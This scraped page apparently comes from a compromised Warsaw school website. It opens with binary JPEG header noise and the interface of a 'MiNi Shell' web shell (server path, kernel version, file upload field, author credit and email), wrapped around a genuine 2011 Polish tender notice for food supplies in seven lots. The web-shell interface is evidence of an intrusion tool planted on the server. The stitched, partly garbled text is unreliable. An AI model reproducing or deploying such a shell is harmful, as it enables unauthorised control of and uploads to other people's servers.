JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111103/363856-N-2011.html

<p class="kh_header"><b>Warszawa: dostawa artykułów spożywczych z podziałem na 7 pakietów</b><br>
<b>Numer ogłoszenia: 363856 - 2011; data zamieszczenia: 03.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Sportowych nr 72 , ul. Konwiktorska 5/7, 00-216 Warszawa, woj. mazowieckie, tel. 22 8313643, faks 22 8316753.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anders.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: powiatowa samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów spożywczych z podziałem na 7 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na pakiety: 1. Pieczywo, wyroby piekarskie, 2. Nabiał, 3. Warzywa, owoce, jajka , 4. Mięso, wędliny, 5. Produkty pozostałe 6. Mrożonki 7. Ryby - w asortymencie i w ilościach określonych w ofercie - formularz ogólny.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.81.00.00-9, 15.11.11.00-0, 15.11.30.00-3, 15.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 2, tj. oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010r. poz. nr 759 z późn. zmian.). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 2, tj. oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian.). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o  złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 2, tj. oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian.). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o  złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 2, tj. oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010 r. poz. nr 759 z późn. zmian.). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o  złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anders.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Sportowych Nr 72, ul. Konwiktorska 5/7, 00-216  Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2011 godzina 10:00, miejsce: Zespół Szkół Sportowych Nr 72, ul. Konwiktorska 5/7, 00-216  Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo, wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb farmerski, 450 g	szt	200,
Chleb wileński 420g	szt	200,
Chleb razowy z dynią 500g	szt	250,
Chleb razowy ze słonecznikiem 500g	szt	250,
Chleb sojowy 750g	szt	250,
Chleb pszenny 420 g	szt	250,
Chleb cebulowy 350g	szt	150,
Bułki kajzerki 50g	szt	25000,
Bułka graham 50g	szt	800,
Bułka cebulowa 50g	szt	800,
Bułeczka z sezamem 50g	szt	800,
Bułki wrocławskie długie 250g	szt	1000,
Bułka op 1kg	kg	500,
Fantazja truskawkowa95g, ciastko	szt	2400,
Pączki z nadzieniem różanym 65g	szt	2400,
Ciastko gniazdko 60g	szt	2400,
Ciastko ślimaczek waniliowy 120g	szt	2400,
Drożdżówka z budyniem 100g	szt	2400,
Ciastko typu donut FB110g	szt	2400,
Ciastko drożdżowe malinowo-waniliowe 100g	szt	2400,
Rożek francuski z jabłkiem 125g	szt	2400,
Ciastko precel z makiem 120g	szt	1800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7, 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Masło w kostkach typu primo 80% tł. 250g	kg	350,
Masło typu ekstra 80% op. 250g	kg	380,
Mleko 3,2 % pasteryzowane typu Łaciate 1l	litr	600,
Śmietana pasteryzowana 30% /500 ml	op.	1250,
Jogurt typu Jogi ,2% tł 250 g	szt	1500,
Jogurt zwykły 150 g	szt	1900,
Serki homogenizowane truskawkowe 30%tł minimum 140 g	szt	1600,
Serki typu Fantazja 30% op. 140g	szt	1500,
Serki wiejskie 2,5% 130g	szt	800,
Jogurt 2% tł. typu Actimel 100g	szt	1350,
Serki topione typu Hochland 200g	szt	200,
Ser żółty królewski.op. 500g	kg	350,
Kefir 1,5% op. 100g	op.	1650.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.53.00.00-2, 15.51.11.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa, owoce, jajka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cebula op.1kg	kg	950,
Groch Jaś op.1kg	kg	150,
Jabłka op.1kg	kg	3500,
Kapusta biała 	kg	900,
Kapusta czerwona	kg	450,
Kapusta kiszona	kg	1200,
Kapusta pekińska	kg	400,
Marchew świeza	kg	4000,
Ogórki kiszone	kg	520,
Ogórki konserwowe,  a 1 litr	szt.	550,
Ogórki świeże	kg	550,
Papryka świeża czerwona	kg	350,
Pieczarki op.1kg	kg	560,
Pietruszka korzeń op.1kg	kg	550,
Pomidory świeże op.1kg	kg	700,
Selery op. 1kg	kg	750,
Fasolka szparagowa op. 1kg	kg	650,
Kalafior	szt.	550,
Ziemniaki op.1kg	kg	32000,
Jaja kurze średnie I gatunek	szt.	16000,
Banany op.5kg	kg	2800,
Por op.500g	kg	350,
Szczypior	pęcz	550,
Koper	pęcz	450,
Buraki op. 2kg	kg	900,
Cytryny op.500g	kg	150,
Szarony op.1kg	kg	350,
Kiwi op.1kg	kg	500,
Morela suszona op. 500g	kg	60,
Śliwka suszona op. 500g	kg	30,
Gruszka op. 1kg	kg	1600,
Winogrona jasne op.2kg	kg	950,
Nektarynki op.2kg	kg	680,
Groch łuskany op.500g	kg	120,
Pietruszka natka	pęcz	450,
Mandarynki op.1kg	kg	1050,
Śliwka węgierka op.1kg	kg	500,
Pomarańcze op.1kg	kg	1200,
Truskawka świeża op. 2kg	kg	600,
Rzodkiewka 	pęcz	1000,
Botwinka	pęcz	350,
Rabarbar op. 500g	kg	150,
Brzoskwinia świeża op.1kg	kg	550,
Czereśnia op. 2kg	kg	450,
Szczaw świeży op.1kg	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso, wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Karkówka bez kości op.2kg	kg	600,
Schab z kością op. 2kg	kg	2500,
Piersi z kurczaka op. 1kg	kg	1300,
Łopatka op. 2kg	kg	1800,
Szynka wieprzowa bez kości op. 2kg	kg	2600,
Szponder wołowy op. 2kg	kg	80,
Korpusy kurczaka op. 2kg	kg	400,
Boczek surowy op. 1kg	kg	1100,
Polędwica op. 0,5kg	kg	70,
Słonina op. 1kg	kg	160,
Uda kurczaka op. 1kg	kg	3500,
Filet z indyka op. 1kg	kg	1800,
Boczek wędzony op. 1kg	kg	200,
Podwawelska op. 300g	kg	250,
Ogonówka op. 300g	kg	150,
Szynka op.500g	kg	550,
Krakowska op. 500g	kg	150,
Mielonka op. 500g	kg	120,
Parówki op.500g	kg	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.11.00-0, 15.11.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Produkty pozostałe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chrzan tarty słoik 0,27 kg	szt.	100,
Dżem wysokosłodzony,  0,27kg truskawkowy	szt.	180,
Groszek konserwowy 400 g.	szt.	300,
Herbata ekspresowa typu lipton op. 50 szt.	szt.	220,
Kasza jęczmienna wiejska 1kg	kg	600,
Koncentrat buraczany w butelce 300ml	szt.	50,
Koncentrat pomidorowy 190 g	szt	700,
Majonez  400 ml.	szt	480,
Makaron nitki opakowanie 500g	kg	200,
 Makaron świderki opakowanie 500g	kg	500,
Mąka wrocławska 550	kg	800,
Mąka ziemniaczana opakowanie 500g	kg	100,
Miód wielokwiatowy naturalny słoik 500g	szt.	350,
Musztarda słoik 200 g	szt	180,
Olej kujawski 1l	litr	1100,
Płatki typu Nesquik  400 g opakowanie	kg	120,
Ryż długoziarnisty op 1kg	kg	700,
Sól opakowanie 1kg	kg	600,
Cukier opakowanie 1kg	kg	1800,
Czosnek granulowany 20 g	op	500,
Kwasek cytrynowy  50 g	op	400,
Liść laurowy 6 g	op	200,
Majeranek  20 g	op	350,
Papryka słodka  20 g	op	150,
Pieprz mielony czarny  20 g	op	800,
Przyprawa Kucharek odpowiednik 200 g	kg	850,
Ziele angielskie  20 g	op	250,
Przyprawa do kurczaka 40 g	op	500,
Oregano  10 g	op	250,
Ketchup 400 ml	szt.	380,
Makaron Spaghetti włoski	kg	300,
Kasza gryczana opakowanie 1kg	kg	400,
Kukurydza w puszce 400g	puszk	650,
Szczaw konserwowy 200 g	szt	250,
Barszcz biały w proszku 200g	szt	600,
Ananas w puszkach 250g	szt	350,
Brzoskwinie w puszkach 450g	szt	350,
Rodzynki opakowanie 200g	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka owocowa mrożonka- wiśnia	kg	550,
Mieszanka owocowa mrożonka wieloowocowa	kg	400,
Szpinak	kg	350,
Truskawka	kg	600,
Porzeczka czarna	kg	500,
Fasolka szparagowa  żółta	kg	350,
Frytki karbowane	kg	1200,
Pyzy zwykłe bez mięsa	kg	1000,
Zupa jarzynowa	kg	450,
Marchewka z groszkiem	kg	800,
Brokuły	kg	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryba mrożona na sucho mintaj	kg	200,
Ryba mrożona na sucho dorsz płaty extra	kg	200,
Ryba świeża dorsz	kg	650.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com